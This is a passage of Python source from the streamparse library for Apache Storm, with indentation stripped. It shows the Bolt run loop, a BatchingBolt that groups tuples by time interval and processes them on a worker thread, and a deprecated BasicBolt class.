:param tup: the tuple to fail (``id`` if ``str``).
:type tup: str or Tuple
"""
tup_id = tup.id if isinstance(tup, Tuple) else tup
send_message({'command': 'fail', 'id': tup_id})
def run(self):
"""Main run loop for all bolts.
Performs initial handshake with Storm and reads tuples handing them off
to subclasses. Any exceptions are caught and logged back to Storm
prior to the Python process exiting.
Subclasses should **not** override this method.
"""
storm_conf, context = read_handshake()
self._setup_component(storm_conf, context)
try:
self.initialize(storm_conf, context)
while True:
self._current_tups = [read_tuple()]
self.process(self._current_tups[0])
if self.auto_ack:
self.ack(self._current_tups[0])
# reset so that we don't accidentally fail the wrong tuples
# if a successive call to read_tuple fails
self._current_tups = []
except Exception as e:
log_msg = "Exception in {}.run()".format(self.__class__.__name__)
if len(self._current_tups) == 1:
tup = self._current_tups[0]
log_msg = "{} while processing {!r}".format(log_msg, tup)
self.raise_exception(e, tup)
if self.auto_fail:
self.fail(tup)
log.error(log_msg, exc_info=True)
sys.exit(1)
class BatchingBolt(Bolt):
"""A bolt which batches tuples for processing.
Batching tuples is unexpectedly complex to do correctly. The main problem
is that all bolts are single-threaded. The difficult comes when the
topology is shutting down because Storm stops feeding the bolt tuples. If
the bolt is blocked waiting on stdin, then it can't process any waiting
tuples, or even ack ones that were asynchronously written to a data store.
This bolt helps with that grouping tuples based on a time interval and then
processing them on a worker thread.
To use this class, you must implement ``process_batch``. ``group_key`` can
be optionally implemented so that tuples are grouped before
``process_batch`` is even called.
**Example**:
.. code-block:: python
from streamparse.bolt import BatchingBolt
class WordCounterBolt(BatchingBolt):
secs_between_batches = 5
def group_key(self, tup):
word = tup.values[0]
return word # collect batches of words
def process_batch(self, key, tups):
# emit the count of words we had per 5s batch
self.emit([key, len(tups)])
"""
auto_anchor = True
"""A ``bool`` indicating whether or not the bolt should automatically
anchor emits to the incoming tuple ID. Tuple anchoring is how Storm
provides reliability, you can read more about `tuple anchoring in Storm's
docs <https://storm.incubator.apache.org/documentation/Guaranteeing-message-processing.html#what-is-storms-reliability-api>`_.
Default is ``True``.
"""
auto_ack = True
"""A ``bool`` indicating whether or not the bolt should automatically
acknowledge tuples after ``process_batch()`` is called. Default is
``True``.
"""
auto_fail = True
"""A ``bool`` indicating whether or not the bolt should automatically fail
tuples when an exception occurs when the ``process_batch()`` method is
called. Default is ``True``.
"""
secs_between_batches = 2
"""The time (in seconds) between calls to ``process_batch()``. Note that if
there are no tuples in any batch, the BatchingBolt will continue to sleep.
Note: Can be fractional to specify greater precision (e.g. 2.5).
"""
def __init__(self):
super(BatchingBolt, self).__init__()
self.exc_info = None
signal.signal(signal.SIGINT, self._handle_worker_exception)
iname = self.__class__.__name__
threading.current_thread().name = '{}:main-thread'.format(iname)
self._batches = defaultdict(list)
self._batch_lock = threading.Lock()
self._batcher = threading.Thread(target=self._batch_entry)
self._batcher.name = '{}:_batcher-thread'.format(iname)
self._batcher.daemon = True
self._batcher.start()
def group_key(self, tup):
"""Return the group key used to group tuples within a batch.
By default, returns None, which put all tuples in a single
batch, effectively just time-based batching. Override this create
multiple batches based on a key.
:param tup: the tuple used to extract a group key
:type tup: Tuple
:returns: Any ``hashable`` value.
"""
return None
def process_batch(self, key, tups):
"""Process a batch of tuples. Should be overridden by subclasses.
:param key: the group key for the list of batches.
:type key: hashable
:param tups: a `list` of :class:`streamparse.ipc.Tuple` s for the group.
:type tups: list
"""
raise NotImplementedError()
def emit(self, tup, **kwargs):
"""Modified emit that will not return task IDs after emitting.
See :class:`streamparse.ipc.Bolt` for more information.
:returns: ``None``.
"""
kwargs['need_task_ids'] = False
return super(BatchingBolt, self).emit(tup, **kwargs)
def emit_many(self, tups, **kwargs):
"""Modified emit_many that will not return task IDs after emitting.
See :class:`streamparse.ipc.Bolt` for more information.
:returns: ``None``.
"""
kwargs['need_task_ids'] = False
return super(BatchingBolt, self).emit_many(tups, **kwargs)
def run(self):
"""Modified and simplified run loop which runs in the main thread since
we only need to add tuples to the proper batch for later processing
in the _batcher thread.
"""
storm_conf, context = read_handshake()
self._setup_component(storm_conf, context)
tup = None
try:
self.initialize(storm_conf, context)
while True:
tup = read_tuple()
group_key = self.group_key(tup)
with self._batch_lock:
self._batches[group_key].append(tup)
except Exception as e:
log.error("Exception in %s.run() while adding %r to batch",
self.__class__.__name__, tup, exc_info=True)
self.raise_exception(e)
def _batch_entry(self):
"""Entry point for the batcher thread."""
try:
while True:
time.sleep(self.secs_between_batches)
with self._batch_lock:
if not self._batches:
# No tuples to save
continue
for key, batch in iteritems(self._batches):
self._current_tups = batch
self.process_batch(key, batch)
if self.auto_ack:
for tup in batch:
self.ack(tup)
self._batches = defaultdict(list)
except Exception as e:
log_msg = ("Exception in {}.run() while processing tuple batch "
"{!r}.".format(self.__class__.__name__,
self._current_tups))
log.error(log_msg, exc_info=True)
self.raise_exception(e, self._current_tups)
if self.auto_fail and self._current_tups:
for tup in self._current_tups:
self.fail(tup)
self.exc_info = sys.exc_info()
os.kill(os.getpid(), signal.SIGINT) # interrupt stdin waiting
def _handle_worker_exception(self, signum, frame):
"""Handle an exception raised in the worker thread.
Exceptions in the _batcher thread will send a SIGINT to the main
thread which we catch here, and then raise in the main thread.
"""
reraise(*self.exc_info)
class BasicBolt(Bolt):
def __init__(self):
super(BasicBolt, self).__init__()
warnings.warn("BasicBolt is deprecated and "
"will be removed in a future streamparse release. "
"Please use Bolt.", DeprecationWarning)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.